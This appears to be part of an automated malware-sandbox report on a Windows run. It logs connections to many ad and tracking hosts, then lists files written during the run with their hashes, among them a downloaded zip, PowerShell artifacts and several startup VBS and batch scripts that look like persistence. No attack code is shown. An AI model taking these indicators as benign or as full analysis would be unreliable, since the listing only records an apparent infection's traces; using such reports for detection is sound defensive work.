FR 13.32.145.43:443 cdn.sophi.io tcp
US 13.32.164.104:443 sb.scorecardresearch.com tcp
US 8.8.8.8:53 104.164.32.13.in-addr.arpa udp
US 8.8.8.8:53 s.skimresources.com udp
US 8.8.8.8:53 ak.sail-horizon.com udp
US 8.8.8.8:53 cdn.brandmetrics.com udp
FR 52.222.169.4:443 ak.sail-horizon.com tcp
US 104.26.0.90:443 cdn.brandmetrics.com tcp
GB 142.250.200.34:443 securepubads.g.doubleclick.net udp
US 104.18.166.224:443 pub.doubleverify.com tcp
US 8.8.8.8:53 pb-rtd.ccgateway.net udp
US 8.8.8.8:53 snap.licdn.com udp
GB 199.232.56.157:443 static.ads-twitter.com tcp
US 35.94.16.34:443 pb-rtd.ccgateway.net tcp
US 151.101.1.44:443 cdn.taboola.com tcp
US 52.91.215.149:443 data-sales.ccgateway.net tcp
US 104.16.144.111:443 c2.piano.io tcp
US 151.101.1.44:443 cdn.taboola.com tcp
US 35.94.16.34:443 pb-rtd.ccgateway.net tcp
US 34.117.77.79:443 ml314.com udp
US 151.101.0.64:443 i.businessinsider.com tcp
US 216.239.32.181:443 analytics.google.com tcp
US 75.2.40.13:443 api.sail-personalize.com tcp
US 35.94.16.34:443 pb-rtd.ccgateway.net tcp
BE 64.233.166.156:443 stats.g.doubleclick.net tcp
BE 64.233.166.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 direct.adsrvr.org udp
US 8.8.8.8:53 ib.adnxs-simple.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
US 172.64.151.101:443 htlb.casalemedia.com tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
BE 2.21.17.83:443 a.teads.tv tcp
BE 2.21.17.83:443 a.teads.tv tcp
US 52.223.6.21:443 direct.adsrvr.org tcp
US 52.223.6.21:443 direct.adsrvr.org tcp
NL 185.89.211.116:443 ib.adnxs-simple.com tcp
NL 185.89.211.116:443 ib.adnxs-simple.com tcp
NL 69.173.156.150:443 prebid-server.rubiconproject.com tcp
NL 69.173.156.150:443 prebid-server.rubiconproject.com tcp
NL 69.173.156.150:443 prebid-server.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
FR 18.244.28.105:443 hb.yellowblue.io tcp
FR 18.244.28.105:443 hb.yellowblue.io tcp
US 52.91.215.149:443 privacy-location-edge.ccgateway.net tcp
BE 104.68.95.245:443 cdn.cxense.com tcp
US 104.244.42.131:443 analytics.twitter.com tcp
PL 93.184.221.165:443 t.co tcp
GB 142.250.187.196:443 www.google.com tcp
FR 18.244.28.105:443 hb.yellowblue.io tcp
FR 52.84.174.60:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 156.166.233.64.in-addr.arpa udp
US 8.8.8.8:53 13.40.2.75.in-addr.arpa udp
US 8.8.8.8:53 101.151.64.172.in-addr.arpa udp
US 8.8.8.8:53 116.211.89.185.in-addr.arpa udp
US 8.8.8.8:53 150.156.173.69.in-addr.arpa udp
US 8.8.8.8:53 139.156.173.69.in-addr.arpa udp
US 8.8.8.8:53 83.17.21.2.in-addr.arpa udp
US 8.8.8.8:53 21.6.223.52.in-addr.arpa udp
US 8.8.8.8:53 131.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 165.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 245.95.68.104.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 105.28.244.18.in-addr.arpa udp
FR 18.155.124.109:443 aax.amazon-adsystem.com tcp
FR 18.155.124.109:443 aax.amazon-adsystem.com tcp
US 2.22.144.155:443 snap.licdn.com tcp
FR 18.155.129.80:443 launchpad-wrapper.privacymanager.io tcp
US 104.22.52.173:443 cdn.hadronid.net tcp
FR 18.155.129.21:443 tags.crwdcntrl.net tcp
US 151.101.1.91:443 s.skimresources.com tcp
FR 18.244.28.83:443 paywall.sophi.io tcp
FR 18.155.129.113:443 launchpad.privacymanager.io tcp
US 35.190.91.160:443 p.skimresources.com tcp
US 35.190.91.160:443 p.skimresources.com tcp
US 35.201.67.47:443 t.skimresources.com tcp
US 35.190.59.101:443 r.skimresources.com tcp
US 104.22.5.69:443 a.ad.gt tcp
IE 20.107.224.50:443 collector.brandmetrics.com tcp
US 13.107.42.14:443 px.ads.linkedin.com tcp
IE 63.33.74.9:443 bcp.crwdcntrl.net tcp
US 18.245.199.9:443 geo.privacymanager.io tcp
FR 18.244.28.111:443 fr-actions.trackonomics.net tcp
US 35.201.67.47:443 t.skimresources.com udp
US 18.245.175.70:443 trx-hub.com tcp
US 18.245.175.70:443 trx-hub.com tcp
US 104.22.5.69:443 a.ad.gt tcp
US 8.8.8.8:53 101.59.190.35.in-addr.arpa udp
US 8.8.8.8:53 47.67.201.35.in-addr.arpa udp
US 8.8.8.8:53 14.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 50.224.107.20.in-addr.arpa udp
US 8.8.8.8:53 69.5.22.104.in-addr.arpa udp
US 8.8.8.8:53 9.74.33.63.in-addr.arpa udp
US 8.8.8.8:53 9.199.245.18.in-addr.arpa udp
US 8.8.8.8:53 111.28.244.18.in-addr.arpa udp
US 8.8.8.8:53 70.175.245.18.in-addr.arpa udp
NL 141.226.228.48:443 trc-events.taboola.com tcp
US 104.18.144.126:443 buy.tinypass.com tcp
FR 57.128.96.120:443 events.newsroom.bi tcp
US 216.239.32.181:443 analytics.google.com udp
DE 35.157.80.156:443 prebid-a.rubiconproject.com tcp
DE 35.157.80.156:443 prebid-a.rubiconproject.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

\??\pipe\LOCAL\crashpad_2456_DVVUUPLFXLHSAZQF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2bf936bddf9beb45b61783e9d6474439
SHA1 aa15d0e509ae2e78ffe266daff152c354ccea01e
SHA256 ea5d8885f02d9d11cee90e5cc8de02abdcaaa433df5cd0063ab9a47926f30b13
SHA512 862f31aea8ba176d15d25f36aa3ddf5236c59c418890c3b02a461597cf10b49b40ee22946a6172cd1b129a865ef3fbf1018f6e89d08299d44b9b3ac2ee4919eb

C:\Users\Admin\Downloads\Classic_Tag.zip

MD5 90cbdd4859c446fed1a9c40696a67f4a
SHA1 7efd767733f22d880283899781a039d34004b00a
SHA256 d8f808e425c141619646fb187a9a402394c59459da06df287b88fd977fae5df5
SHA512 3b170cf326360cb2cdb6be6581105b19266241b82fa35f29f1eb53bfce99894a3168bcbf5d5491cb339de7e6f4963c693e423698b93ec61dfaa4630706b7cdfd

C:\Users\Admin\Downloads\Classic_Tag.zip:Zone.Identifier

MD5 6f1bb86ac1640cffc98d12c8bb6162ea
SHA1 68c018bc23f169d2b052a2f4f57783e4d9c56f3d
SHA256 bc2229e54075f536e88b12416f1c6a9a7002972ddfcb23a024c46fc74d4feb80
SHA512 9e4dddb24f2f889f8d94d486b0c8180e3311faf04d52fd0a40949cd4d055b2c6afb4853fdd3f7b18453a5a67b329f9db59fd00d77ab075b648269d4a48c9d39d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6e3ecf2e726b4688a3b50a1da7c30aa3
SHA1 112056c3a0422ebf82f4be0713c6be4070b45e25
SHA256 a30bf1cfe5b9a86e9a2ea1908925ded1c0db3081b9c7c4d3b0bf7c5ab65d7661
SHA512 3e8c25e1e1f26724b18b615f5dc7503d9c6ef794a1fc43b1ef41044bc2615050d9c11ed23e8fd45e29dbf1120fa4538e067bac0331989bd44ea717a09ec91c02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bf3b27cf2b30c35b235f2c7dc71235ff
SHA1 1cfd9eb98ea08d02f05c0e462721f3c07fd82c81
SHA256 a02f3e65652296d17e452d1790804cf30c7a8d275d0047677e72126ff4237823
SHA512 f625104f94e9e59918e662b14b0690ad582167ac9ecf4b9eaadc6f9406f50eded7e92fe6df7d6681278bdd5da18a516bbc5c6ce94ed893944efdd00b5ba7d4ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzpx5gyj.cov.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1548-72-0x0000021987B90000-0x0000021987BB2000-memory.dmp

memory/1548-81-0x0000021987B80000-0x0000021987B88000-memory.dmp

memory/1548-82-0x0000021987D40000-0x0000021987D72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7c082a4571d1b9f96be4c8ef511ffdce
SHA1 4543e2b0bae2e14bdb733d71ab89f29a6c386e6b
SHA256 4dc3d729d7590b19e02effb657c53b71f5fb0bdde870e2f8b6fcb2c8a2d05a7e
SHA512 afdb5bf614ca2bc0ad4dc71c9c762c411624a8a32d0cec394132a9d7b8b35ddbf2266e3932b35ecf87217a0817ea128e48fd5beda9ea3047d961a108edc3ea1c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb15ee5741b379245ca8549cb0d4ecf8
SHA1 3555273945abda3402674aea7a4bff65eb71a783
SHA256 b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\startup_str_714.vbs

MD5 28098c37d913d16ceb796e4e56a5d747
SHA1 7245e7e99cf473fc4e59533d815718b7b3446ccd
SHA256 247e81ec42c38b83a2103a903883b931102c0819e19e005fc2338e3535fe898f
SHA512 60615c3868e01dcb4303029fbefc70453e47d2202a60c60ded8d3beed7b8e9594c7b15dc9720b1651e5ace124617f9ae26a0abea979fc85d677c4884ee8be23c

C:\Users\Admin\AppData\Roaming\startup_str_714.bat

MD5 63314994ebe02008490fdfefa0d57511
SHA1 704c26daec5cbed1e7378952699ceebc60e99218
SHA256 44a89e1a91362387bc0a2a405ee2f13ae33c0b74a6cec88a0c7b5228c0839fc7
SHA512 6c1f4c40ee3c4812f3035d5685ce0aeaa934739a8b58998201673c00d81461031dc6794ebe9c99214c640f09b6cb6b36adf5c994c8408ae1286336deb646bb04

memory/1020-130-0x0000019138700000-0x0000019138732000-memory.dmp

memory/1020-131-0x0000019138730000-0x000001913873E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6a1071fd7ffbb67341ab8622e4cad56f
SHA1 cd9210c475d4d98e91546a2b87bb73478b22657d
SHA256 0f211c967cdbadc59fbf6f45c04ca91e9ad4ff27f0503f8c87046750ca2fc697
SHA512 c86cc9762c40983973784bb3aa678767ce1ed17dd7a685465f6a3008f04cafc14cd669b0ecec88f07dfa9a2ac90d1f420470c19ed2831f25ad423a839000e2f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7fa1ae66c75b2a500f8bdc3ffdd92fe9
SHA1 d05f8e1acf3ff72dd3680f05a78789fe342cc65c
SHA256 920238f68aacb53f59e100ff5b649a38e231f95b1cfe3e09356567532601afee
SHA512 d89f01f031df0f8cd8dc8a391b5432591035f1df6e72f4743e2bfc22398ac2f79a10e5bfe42caabf6fcd11d8ed3cbda785745228dd2fc634596fbd39ec6bfd2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d41a216ab548ade6b289dccb3e2bf6f9
SHA1 de96e229bd7f1401eb17b56e1c415f22f53ece55
SHA256 07ddb16a2061895687e31301df76982f030377b891fa83800d2b3aa1e734c400
SHA512 25c622bac2bd4140bf23b043846477bc16ef6cff9eebb220eff0ebb738f3c7fa4c375bb4eb9d32ecb1c9a2dbb07466e144ce8f6aca141ca1f58241ae8dd7597d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f43dbd501081eb5c8da17ec69f6e1e09
SHA1 c8a79c12203e5115b052c3335b604bf0f7ed9be1
SHA256 267f3bf0a3652bf4205caaaf8fe2512a7c9c9a83c943a2cacc02b5c6898f3a5f
SHA512 ad82f2de7cabd27e4485e0b4b3cf0f5b0205889279bef0e27806e20c923079dbd8220b077b2de4fd89cb00adbf6f4c5d3d5591fa4100a4e8569d5635f4cd9926

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ca42e9cc6de90060a4503debda3ea58
SHA1 652f325e5c423876d85ba1a164301ab2d147604b
SHA256 67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c
SHA512 38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10

C:\Users\Admin\AppData\Roaming\startup_str_242.vbs

MD5 88b92ce85da644b6895b486efaf6fe39
SHA1 f7e34957b86687c00e308a147e6b5693ade24a70
SHA256 89980a40482461a1bfc9f902108578eac50e69a28e4b05abab43f8bf5949cdce
SHA512 96503e9d6746f5314b83061f8172280be0be93acd9d36334f95ac64c8becba467e494457e138032544c4ce0b9d5783d5a8f364c9b4a95dff7c323e1f5fd6295f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 39e9c03b4853fc7897429d89859bed07
SHA1 284e9ecc274bfa1a7b31bb3181a60ed84e8c0a2c
SHA256 ee2b49fbb5facec3177d23729fa9d6435444c5c1ef7c3c18f513a0c75e9ae191
SHA512 5baf4ae78182b7fa4499607fb001c5dfe8cf9f94c9d097bc56d42dbae639fe2fdf72a449824e48b6447865d538b9344cc367239340d9c1c1aa851994510d0e0a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 11e8fa223a7a3d7b8dedeac23313e3ea
SHA1 713a52733322ec267ca24b1d83ff7374f5597bbb
SHA256 7483e057c800cb16e596a66aeb647f0a478e4d6cdd70815a58fba4bc8dda0566
SHA512 ff6fcb1e6bc33e4dd2a4aea376f92d5da20999fa970456cdf843e884cb1ca23232e84a8b37a97bedd05e8ac238916c8f5608627edcf5fb87ef5fb0436f89daea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58a9c8.TMP

MD5 ebaf45b247749da06f10d2fef5c5e730
SHA1 461637a83f7eacf2de904d392876ff0d927c4716
SHA256 529d95377662bc34bef69236449c10345188dee16e542d50c9ca5d8bfdddebd3
SHA512 b2464780958a9d343440b1182831bbc3ad9bd97aa0789212763c1e7e5958b1ea70e8091f21287084223aeec613290d1376ade138c3ebe26c868b45b097bba967

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8528086c51c4f1528a9676038ec213e
SHA1 bd32a682d9df21d36799486346aa1235c96b4d6a
SHA256 7cd0a49f94c512e57e0a7102352ee68c5d7a320db0eec57aea0d5e648d4bcf4a
SHA512 e89d008113f89b978fb65bd6dd0bcde3c4506fbb14e54aa5296607ae34d94081d1e825750dbd9dd864adea462c8dc1263e3d138c041b3d4b7dee78debdef7374

C:\Users\Admin\AppData\Roaming\startup_str_690.vbs

MD5 b121b7c1e501abe8ae0ccd6276869e0c
SHA1 668ea48aaffc2edaca48bb23dd227499041fbc33
SHA256 de61c3ec819cd11b14650bd8c9b56f14f1b2e3d887519395ed78a594e7731e01
SHA512 1bd4e5fd8638f4a565d15dc95c0b4435deb827411eba5fa77613a98c6424c24165827707f200dddc119267746abe50691653db8752870d233980c98e97ed9a89

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d5f4c60803a57e862fa7cff0d080f6d0
SHA1 b545784936ed9d70dccf9d96865c1dcb182f2024
SHA256 9c21d5846dde8f6c1b7e466b9a5c9bc3f3af17cf67032dfc101d1455f948b7bb
SHA512 3e109cf1565e3f91165a5d6fae83ef7ca486d72719d3a37293d488d1443d9961bc14b38b7fee1802ca54acc6fb6722971c00a071c7dad3e31e9fb7d90fe23bc7